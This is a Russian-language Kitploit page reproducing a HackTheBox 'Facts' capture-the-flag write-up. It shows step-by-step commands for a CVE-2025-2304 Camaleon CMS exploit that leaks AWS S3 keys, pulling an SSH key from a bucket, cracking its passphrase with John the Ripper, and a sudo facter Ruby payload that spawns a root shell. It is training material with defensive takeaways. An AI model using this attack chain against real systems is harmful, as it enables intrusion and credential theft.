Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
htb-facts — HackTheBox — Facts (Лёгкий/Linux) | CVE-2025-2304 + AWS S3 + SSH Key + Facter PrivEsc | Kitploit
Инструменты/GitHubGitHub/mattiapertusati/htb-facts
Взлом паролейПовышение привилегийРазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеБезопасность облачных средОбучение и Образование
GitHubmattiapertusati/htb-facts

htb-facts

4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

HackTheBox — Facts (Лёгкий/Linux) | CVE-2025-2304 + AWS S3 + SSH Key + Facter PrivEsc

Репозиторий

HTB — Факты (Easy/Linux) — Сезон 10

HTB Difficulty OS Status Techniques Techniques PrivEsc

Краткое описание

Facts — это простая Linux-машина, для взлома которой требуется эксплуатация известной уязвимости (CVE-2025-2304) в Camaleon CMS для извлечения локальных учетных данных AWS S3. Перебор внутренних S3-корзин выявляет закрытый ключ SSH, который необходимо взломать с помощью John the Ripper для получения первоначального доступа. Повышение привилегий достигается за счет использования неправильной конфигурации sudo на /usr/bin/facter, что позволяет выполнить произвольный код на Ruby для получения root-оболочки.

Цепочка атак: Nmap → Camaleon CMS (CVE-2025-2304) → Перебор S3-корзин → Взлом SSH-ключа → sudo facter → Root


Разведка

Сканирование портов

Начнем со сканирования Nmap для выявления активных сервисов на целевой машине. Bash

root@kitploit:~
nmap -sV -sC -oN nmap_facts 10.129.244.96

Результаты:

ПОРТ СОСТОЯНИЕ СЛУЖБА ВЕРСИЯ 22/tcp open ssh OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.26.3 (Ubuntu) |_http-title: facts |_http-server-header: nginx/1.26.3 (Ubuntu)

Nmap Scan

Nmap показывает два открытых порта: 22 (SSH) и 80 (HTTP). Веб-сервер работает на Nginx. Прежде чем мы сможем правильно взаимодействовать с сайтом, нам нужно добавить хост facts.htb в наш файл /etc/hosts.

root@kitploit:~
echo “10.129.244.96 facts.htb” | sudo tee -a /etc/hosts

Перебор веб-сайта

При посещении сайта на порту 80 мы видим стандартную веб-страницу. Чтобы обнаружить скрытые пути, мы запускаем атаку перебора каталогов (например, с помощью ffuf или gobuster).

root@kitploit:~
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://facts.htb/FUZZ

Перебор выявляет несколько интересных каталогов, связанных с панелью администратора (/admin, /admin.php и т.д.), все они перенаправляют с кодом 302 на http://facts.htb/admin/login.

Enumeration

Посетив страницу входа и аутентифицировавшись (или взглянув на подвал панели), мы обнаруживаем технологию, стоящую за сайтом: Camaleon CMS.

Ключевая деталь привлекает наше внимание в правом нижнем углу: версия CMS — 2.9.0.

Admin Panel


Эксплуатация

Camaleon CMS (CVE-2025-2304)

Зная, что сервер работает под управлением Camaleon CMS 2.9.0, быстрый поиск в Интернете приводит нас к обнаружению критической уязвимости, известной как CVE-2025-2304, которая позволяет повысить привилегии от аутентифицированного пользователя до администратора.

Мы находим публичный эксплойт на GitHub (созданный Alien0ne) и загружаем его на нашу атакующую машину.

GitHub Exploit

Мы запускаем эксплойт, передав имеющиеся у нас учетные данные (например, mattia:mattia), чтобы повысить себя до администратора, извлечь конфиденциальную информацию, а затем вернуться к исходной роли, чтобы не оставить явных следов.

root@kitploit:~
python3 exploit.py -u http://facts.htb -U mattia -P mattia --newpass mattia -e -r

Вывод эксплойта — золотая жила: он извлекает локальные учетные данные AWS S3 и внутреннюю конечную точку, используемую сервером.

  • S3 Access Key: AKIAA103ACAA5953D888
  • S3 Secret Key: ELsaDX4pIZYwPJf+dVdUuoHtkwGsRPvKIGCmDfiR
  • S3 Endpoint: http://localhost:54321 (который становится http://facts.htb:54321 для нас)

Exploit


Перебор S3-корзин

С помощью этих ключей мы можем настроить наш локальный AWS CLI для взаимодействия с S3-сервисом, предоставленным машиной.

root@kitploit:~
aws configure
# Enter the Access Key and Secret Key we just found
# Default region: us
# Default output format: json

Теперь мы можем вывести список доступных корзин, передав собственный URL конечной точки:

root@kitploit:~
aws --endpoint-url http://facts.htb:54321 s3 ls

Мы находим две корзины: internal и randomfacts. Рекурсивно исследуя корзину internal, мы обнаруживаем папку .ssh, содержащую ключи!

root@kitploit:~
aws --endpoint-url http://facts.htb:54321 s3 ls s3://internal/.ssh/ --recursive

Давайте загрузим файл id_ed25519 (закрытый ключ SSH) на нашу машину.


Взлом SSH-ключа

У нас есть закрытый ключ, но он защищен парольной фразой. Чтобы взломать его, мы воспользуемся набором John the Ripper. Сначала преобразуем ключ в формат, который может прочитать John, с помощью ssh2john:

root@kitploit:~
ssh2john id_ed25519 > hash.txt

Затем запускаем атаку по словарю (используя собственный список слов my_guess.txt или классический rockyou.txt):

root@kitploit:~
john --wordlist=my_guess.txt hash.txt

Пароль успешно взломан: dragonballz. Теперь у нас есть всё необходимое для доступа к серверу!

Exploit


Повышение привилегий

Теперь, когда у нас есть всё необходимое, мы можем воспользоваться вторым открытым портом, который нашли ранее: портом SSH (22).

root@kitploit:~
ssh -i id_ed25519 [email protected]

Используем пароль, найденный ранее: dragonballz. Мы внутри!

Теперь нужно выяснить, какой путь можно использовать для получения доступа root, поэтому используем sudo -l.

Путь:

/usr/bin/facter

Для эксплуатации этого пути используем мини-скрипт:

root@kitploit:~
echo 'Facter.add(:pwn) do
  setcode do
    exec (“/bin/bash -p”)
  end
end' > /tmp/pwn.rb

А затем выполним его:

root@kitploit:~
sudo /usr/bin/facter --custom-dir=/tmp pwn

SSH

Мы официально root!!!

Теперь осталось только найти два флага :)

FLAG


Выводы

Атакующий взгляд

  • Раскрытие версии CMS в подвале/заголовках сразу выявляет поверхность атаки
  • Исследование CVE для конкретных версий — всегда первый шаг после идентификации
  • Внутренние сервисы, такие как S3, могут раскрывать конфиденциальные данные, не предназначенные для публичного доступа
  • Закрытые ключи SSH в облачном хранилище — критическая ошибка конфигурации, встречающаяся в реальных средах

Защитный взгляд

  • Никогда не раскрывайте учетные данные AWS в коде приложения или доступном хранилище
  • Ограничьте разрешения S3-корзин — внутренние корзины никогда не должны быть доступны для перебора извне
  • Регулярно проверяйте права sudo — facter с NOPASSWD — прямой путь к root
  • Поддерживайте CMS в актуальном состоянии — для CVE-2025-2304 был доступен патч

Сводка цепочки атак

NMAP — 2 порта обнаружено (22, 80) ↓ Перебор веб-сайта — найден раздел администратора ↓ Camaleon CMS -> CVE-2025-2304 ↓ Эксплуатация + настройки AWS ↓ John the Ripper для хэша ↓ SSH-логин ↓ Sudo -l ↓ Скрипт + выполнение ↓ ROOT ✅


Ссылки

  • CVE-2025-2304
  • Camaleon CMS
  • GTFOBins — facter
  • HackTheBox — Facts
Скачать инструмент